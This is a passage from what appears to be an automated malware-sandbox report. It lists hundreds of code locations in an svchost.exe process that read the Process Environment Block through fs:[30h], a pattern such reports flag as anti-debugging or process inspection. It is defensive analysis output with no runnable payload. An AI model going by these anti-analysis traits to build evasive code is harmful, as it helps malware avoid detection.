          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036B035C mov eax, dword ptr fs:[00000030h]6_2_036B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036B035C mov eax, dword ptr fs:[00000030h]6_2_036B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036B035C mov ecx, dword ptr fs:[00000030h]6_2_036B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036B035C mov eax, dword ptr fs:[00000030h]6_2_036B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036B035C mov eax, dword ptr fs:[00000030h]6_2_036B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036FA352 mov eax, dword ptr fs:[00000030h]6_2_036FA352
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036D8350 mov ecx, dword ptr fs:[00000030h]6_2_036D8350
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0370634F mov eax, dword ptr fs:[00000030h]6_2_0370634F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03708324 mov eax, dword ptr fs:[00000030h]6_2_03708324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03708324 mov ecx, dword ptr fs:[00000030h]6_2_03708324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03708324 mov eax, dword ptr fs:[00000030h]6_2_03708324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03708324 mov eax, dword ptr fs:[00000030h]6_2_03708324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0366A30B mov eax, dword ptr fs:[00000030h]6_2_0366A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0366A30B mov eax, dword ptr fs:[00000030h]6_2_0366A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0366A30B mov eax, dword ptr fs:[00000030h]6_2_0366A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0362C310 mov ecx, dword ptr fs:[00000030h]6_2_0362C310
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03650310 mov ecx, dword ptr fs:[00000030h]6_2_03650310
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036403E9 mov eax, dword ptr fs:[00000030h]6_2_036403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036403E9 mov eax, dword ptr fs:[00000030h]6_2_036403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036403E9 mov eax, dword ptr fs:[00000030h]6_2_036403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036403E9 mov eax, dword ptr fs:[00000030h]6_2_036403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036403E9 mov eax, dword ptr fs:[00000030h]6_2_036403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036403E9 mov eax, dword ptr fs:[00000030h]6_2_036403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036403E9 mov eax, dword ptr fs:[00000030h]6_2_036403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036403E9 mov eax, dword ptr fs:[00000030h]6_2_036403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0364E3F0 mov eax, dword ptr fs:[00000030h]6_2_0364E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0364E3F0 mov eax, dword ptr fs:[00000030h]6_2_0364E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0364E3F0 mov eax, dword ptr fs:[00000030h]6_2_0364E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036663FF mov eax, dword ptr fs:[00000030h]6_2_036663FF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036EC3CD mov eax, dword ptr fs:[00000030h]6_2_036EC3CD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0363A3C0 mov eax, dword ptr fs:[00000030h]6_2_0363A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0363A3C0 mov eax, dword ptr fs:[00000030h]6_2_0363A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0363A3C0 mov eax, dword ptr fs:[00000030h]6_2_0363A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0363A3C0 mov eax, dword ptr fs:[00000030h]6_2_0363A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0363A3C0 mov eax, dword ptr fs:[00000030h]6_2_0363A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0363A3C0 mov eax, dword ptr fs:[00000030h]6_2_0363A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036383C0 mov eax, dword ptr fs:[00000030h]6_2_036383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036383C0 mov eax, dword ptr fs:[00000030h]6_2_036383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036383C0 mov eax, dword ptr fs:[00000030h]6_2_036383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036383C0 mov eax, dword ptr fs:[00000030h]6_2_036383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036B63C0 mov eax, dword ptr fs:[00000030h]6_2_036B63C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036DE3DB mov eax, dword ptr fs:[00000030h]6_2_036DE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036DE3DB mov eax, dword ptr fs:[00000030h]6_2_036DE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036DE3DB mov ecx, dword ptr fs:[00000030h]6_2_036DE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036DE3DB mov eax, dword ptr fs:[00000030h]6_2_036DE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036D43D4 mov eax, dword ptr fs:[00000030h]6_2_036D43D4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036D43D4 mov eax, dword ptr fs:[00000030h]6_2_036D43D4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0362E388 mov eax, dword ptr fs:[00000030h]6_2_0362E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0362E388 mov eax, dword ptr fs:[00000030h]6_2_0362E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0362E388 mov eax, dword ptr fs:[00000030h]6_2_0362E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0365438F mov eax, dword ptr fs:[00000030h]6_2_0365438F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0365438F mov eax, dword ptr fs:[00000030h]6_2_0365438F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03628397 mov eax, dword ptr fs:[00000030h]6_2_03628397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03628397 mov eax, dword ptr fs:[00000030h]6_2_03628397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03628397 mov eax, dword ptr fs:[00000030h]6_2_03628397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03634260 mov eax, dword ptr fs:[00000030h]6_2_03634260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03634260 mov eax, dword ptr fs:[00000030h]6_2_03634260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03634260 mov eax, dword ptr fs:[00000030h]6_2_03634260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0362826B mov eax, dword ptr fs:[00000030h]6_2_0362826B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036E0274 mov eax, dword ptr fs:[00000030h]6_2_036E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036E0274 mov eax, dword ptr fs:[00000030h]6_2_036E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036E0274 mov eax, dword ptr fs:[00000030h]6_2_036E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036E0274 mov eax, dword ptr fs:[00000030h]6_2_036E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036E0274 mov eax, dword ptr fs:[00000030h]6_2_036E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036E0274 mov eax, dword ptr fs:[00000030h]6_2_036E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036E0274 mov eax, dword ptr fs:[00000030h]6_2_036E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036E0274 mov eax, dword ptr fs:[00000030h]6_2_036E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036E0274 mov eax, dword ptr fs:[00000030h]6_2_036E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036E0274 mov eax, dword ptr fs:[00000030h]6_2_036E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036E0274 mov eax, dword ptr fs:[00000030h]6_2_036E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036E0274 mov eax, dword ptr fs:[00000030h]6_2_036E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036B8243 mov eax, dword ptr fs:[00000030h]6_2_036B8243
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036B8243 mov ecx, dword ptr fs:[00000030h]6_2_036B8243
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0370625D mov eax, dword ptr fs:[00000030h]6_2_0370625D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0362A250 mov eax, dword ptr fs:[00000030h]6_2_0362A250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03636259 mov eax, dword ptr fs:[00000030h]6_2_03636259
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036EA250 mov eax, dword ptr fs:[00000030h]6_2_036EA250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036EA250 mov eax, dword ptr fs:[00000030h]6_2_036EA250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0362823B mov eax, dword ptr fs:[00000030h]6_2_0362823B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036402E1 mov eax, dword ptr fs:[00000030h]6_2_036402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036402E1 mov eax, dword ptr fs:[00000030h]6_2_036402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036402E1 mov eax, dword ptr fs:[00000030h]6_2_036402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0363A2C3 mov eax, dword ptr fs:[00000030h]6_2_0363A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0363A2C3 mov eax, dword ptr fs:[00000030h]6_2_0363A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0363A2C3 mov eax, dword ptr fs:[00000030h]6_2_0363A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0363A2C3 mov eax, dword ptr fs:[00000030h]6_2_0363A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0363A2C3 mov eax, dword ptr fs:[00000030h]6_2_0363A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_037062D6 mov eax, dword ptr fs:[00000030h]6_2_037062D6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036402A0 mov eax, dword ptr fs:[00000030h]6_2_036402A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036402A0 mov eax, dword ptr fs:[00000030h]6_2_036402A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036C62A0 mov eax, dword ptr fs:[00000030h]6_2_036C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036C62A0 mov ecx, dword ptr fs:[00000030h]6_2_036C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036C62A0 mov eax, dword ptr fs:[00000030h]6_2_036C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036C62A0 mov eax, dword ptr fs:[00000030h]6_2_036C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036C62A0 mov eax, dword ptr fs:[00000030h]6_2_036C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036C62A0 mov eax, dword ptr fs:[00000030h]6_2_036C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0366E284 mov eax, dword ptr fs:[00000030h]6_2_0366E284
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0366E284 mov eax, dword ptr fs:[00000030h]6_2_0366E284
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036B0283 mov eax, dword ptr fs:[00000030h]6_2_036B0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036B0283 mov eax, dword ptr fs:[00000030h]6_2_036B0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036B0283 mov eax, dword ptr fs:[00000030h]6_2_036B0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03704164 mov eax, dword ptr fs:[00000030h]6_2_03704164
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03704164 mov eax, dword ptr fs:[00000030h]6_2_03704164
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036C4144 mov eax, dword ptr fs:[00000030h]6_2_036C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036C4144 mov eax, dword ptr fs:[00000030h]6_2_036C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036C4144 mov ecx, dword ptr fs:[00000030h]6_2_036C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036C4144 mov eax, dword ptr fs:[00000030h]6_2_036C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036C4144 mov eax, dword ptr fs:[00000030h]6_2_036C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0362C156 mov eax, dword ptr fs:[00000030h]6_2_0362C156
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036C8158 mov eax, dword ptr fs:[00000030h]6_2_036C8158
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03636154 mov eax, dword ptr fs:[00000030h]6_2_03636154
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03636154 mov eax, dword ptr fs:[00000030h]6_2_03636154
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03660124 mov eax, dword ptr fs:[00000030h]6_2_03660124
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036DE10E mov eax, dword ptr fs:[00000030h]6_2_036DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036DE10E mov ecx, dword ptr fs:[00000030h]6_2_036DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036DE10E mov eax, dword ptr fs:[00000030h]6_2_036DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036DE10E mov eax, dword ptr fs:[00000030h]6_2_036DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036DE10E mov ecx, dword ptr fs:[00000030h]6_2_036DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036DE10E mov eax, dword ptr fs:[00000030h]6_2_036DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036DE10E mov eax, dword ptr fs:[00000030h]6_2_036DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036DE10E mov ecx, dword ptr fs:[00000030h]6_2_036DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036DE10E mov eax, dword ptr fs:[00000030h]6_2_036DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036DE10E mov ecx, dword ptr fs:[00000030h]6_2_036DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036DA118 mov ecx, dword ptr fs:[00000030h]6_2_036DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036DA118 mov eax, dword ptr fs:[00000030h]6_2_036DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036DA118 mov eax, dword ptr fs:[00000030h]6_2_036DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036DA118 mov eax, dword ptr fs:[00000030h]6_2_036DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036F0115 mov eax, dword ptr fs:[00000030h]6_2_036F0115
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_037061E5 mov eax, dword ptr fs:[00000030h]6_2_037061E5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036601F8 mov eax, dword ptr fs:[00000030h]6_2_036601F8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036F61C3 mov eax, dword ptr fs:[00000030h]6_2_036F61C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036F61C3 mov eax, dword ptr fs:[00000030h]6_2_036F61C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036AE1D0 mov eax, dword ptr fs:[00000030h]6_2_036AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036AE1D0 mov eax, dword ptr fs:[00000030h]6_2_036AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036AE1D0 mov ecx, dword ptr fs:[00000030h]6_2_036AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036AE1D0 mov eax, dword ptr fs:[00000030h]6_2_036AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036AE1D0 mov eax, dword ptr fs:[00000030h]6_2_036AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03670185 mov eax, dword ptr fs:[00000030h]6_2_03670185
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036EC188 mov eax, dword ptr fs:[00000030h]6_2_036EC188
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036EC188 mov eax, dword ptr fs:[00000030h]6_2_036EC188
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036D4180 mov eax, dword ptr fs:[00000030h]6_2_036D4180
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036D4180 mov eax, dword ptr fs:[00000030h]6_2_036D4180
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036B019F mov eax, dword ptr fs:[00000030h]6_2_036B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036B019F mov eax, dword ptr fs:[00000030h]6_2_036B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036B019F mov eax, dword ptr fs:[00000030h]6_2_036B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036B019F mov eax, dword ptr fs:[00000030h]6_2_036B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0362A197 mov eax, dword ptr fs:[00000030h]6_2_0362A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0362A197 mov eax, dword ptr fs:[00000030h]6_2_0362A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0362A197 mov eax, dword ptr fs:[00000030h]6_2_0362A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0365C073 mov eax, dword ptr fs:[00000030h]6_2_0365C073
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03632050 mov eax, dword ptr fs:[00000030h]6_2_03632050
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036B6050 mov eax, dword ptr fs:[00000030h]6_2_036B6050
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0362A020 mov eax, dword ptr fs:[00000030h]6_2_0362A020
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0362C020 mov eax, dword ptr fs:[00000030h]6_2_0362C020
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036C6030 mov eax, dword ptr fs:[00000030h]6_2_036C6030
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036B4000 mov ecx, dword ptr fs:[00000030h]6_2_036B4000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036D2000 mov eax, dword ptr fs:[00000030h]6_2_036D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036D2000 mov eax, dword ptr fs:[00000030h]6_2_036D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036D2000 mov eax, dword ptr fs:[00000030h]6_2_036D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036D2000 mov eax, dword ptr fs:[00000030h]6_2_036D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036D2000 mov eax, dword ptr fs:[00000030h]6_2_036D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036D2000 mov eax, dword ptr fs:[00000030h]6_2_036D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036D2000 mov eax, dword ptr fs:[00000030h]6_2_036D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036D2000 mov eax, dword ptr fs:[00000030h]6_2_036D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0364E016 mov eax, dword ptr fs:[00000030h]6_2_0364E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0364E016 mov eax, dword ptr fs:[00000030h]6_2_0364E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0364E016 mov eax, dword ptr fs:[00000030h]6_2_0364E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0364E016 mov eax, dword ptr fs:[00000030h]6_2_0364E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0362A0E3 mov ecx, dword ptr fs:[00000030h]6_2_0362A0E3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036380E9 mov eax, dword ptr fs:[00000030h]6_2_036380E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036B60E0 mov eax, dword ptr fs:[00000030h]6_2_036B60E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0362C0F0 mov eax, dword ptr fs:[00000030h]6_2_0362C0F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036720F0 mov ecx, dword ptr fs:[00000030h]6_2_036720F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036B20DE mov eax, dword ptr fs:[00000030h]6_2_036B20DE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036280A0 mov eax, dword ptr fs:[00000030h]6_2_036280A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036C80A8 mov eax, dword ptr fs:[00000030h]6_2_036C80A8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036F60B8 mov eax, dword ptr fs:[00000030h]6_2_036F60B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036F60B8 mov ecx, dword ptr fs:[00000030h]6_2_036F60B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0363208A mov eax, dword ptr fs:[00000030h]6_2_0363208A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03638770 mov eax, dword ptr fs:[00000030h]6_2_03638770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03640770 mov eax, dword ptr fs:[00000030h]6_2_03640770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03640770 mov eax, dword ptr fs:[00000030h]6_2_03640770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03640770 mov eax, dword ptr fs:[00000030h]6_2_03640770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03640770 mov eax, dword ptr fs:[00000030h]6_2_03640770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03640770 mov eax, dword ptr fs:[00000030h]6_2_03640770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03640770 mov eax, dword ptr fs:[00000030h]6_2_03640770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03640770 mov eax, dword ptr fs:[00000030h]6_2_03640770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03640770 mov eax, dword ptr fs:[00000030h]6_2_03640770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03640770 mov eax, dword ptr fs:[00000030h]6_2_03640770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03640770 mov eax, dword ptr fs:[00000030h]6_2_03640770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03640770 mov eax, dword ptr fs:[00000030h]6_2_03640770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03640770 mov eax, dword ptr fs:[00000030h]6_2_03640770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0366674D mov esi, dword ptr fs:[00000030h]6_2_0366674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0366674D mov eax, dword ptr fs:[00000030h]6_2_0366674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0366674D mov eax, dword ptr fs:[00000030h]6_2_0366674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03630750 mov eax, dword ptr fs:[00000030h]6_2_03630750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036BE75D mov eax, dword ptr fs:[00000030h]6_2_036BE75D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03672750 mov eax, dword ptr fs:[00000030h]6_2_03672750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03672750 mov eax, dword ptr fs:[00000030h]6_2_03672750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036B4755 mov eax, dword ptr fs:[00000030h]6_2_036B4755
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0366C720 mov eax, dword ptr fs:[00000030h]6_2_0366C720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0366C720 mov eax, dword ptr fs:[00000030h]6_2_0366C720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0366273C mov eax, dword ptr fs:[00000030h]6_2_0366273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0366273C mov ecx, dword ptr fs:[00000030h]6_2_0366273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0366273C mov eax, dword ptr fs:[00000030h]6_2_0366273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036AC730 mov eax, dword ptr fs:[00000030h]6_2_036AC730
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0366C700 mov eax, dword ptr fs:[00000030h]6_2_0366C700
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03630710 mov eax, dword ptr fs:[00000030h]6_2_03630710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03660710 mov eax, dword ptr fs:[00000030h]6_2_03660710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036527ED mov eax, dword ptr fs:[00000030h]6_2_036527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036527ED mov eax, dword ptr fs:[00000030h]6_2_036527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036527ED mov eax, dword ptr fs:[00000030h]6_2_036527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036BE7E1 mov eax, dword ptr fs:[00000030h]6_2_036BE7E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036347FB mov eax, dword ptr fs:[00000030h]6_2_036347FB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036347FB mov eax, dword ptr fs:[00000030h]6_2_036347FB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0363C7C0 mov eax, dword ptr fs:[00000030h]6_2_0363C7C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036B07C3 mov eax, dword ptr fs:[00000030h]6_2_036B07C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036307AF mov eax, dword ptr fs:[00000030h]6_2_036307AF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036E47A0 mov eax, dword ptr fs:[00000030h]6_2_036E47A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036D678E mov eax, dword ptr fs:[00000030h]6_2_036D678E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036F866E mov eax, dword ptr fs:[00000030h]6_2_036F866E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036F866E mov eax, dword ptr fs:[00000030h]6_2_036F866E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0366A660 mov eax, dword ptr fs:[00000030h]6_2_0366A660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0366A660 mov eax, dword ptr fs:[00000030h]6_2_0366A660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03662674 mov eax, dword ptr fs:[00000030h]6_2_03662674
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0364C640 mov eax, dword ptr fs:[00000030h]6_2_0364C640
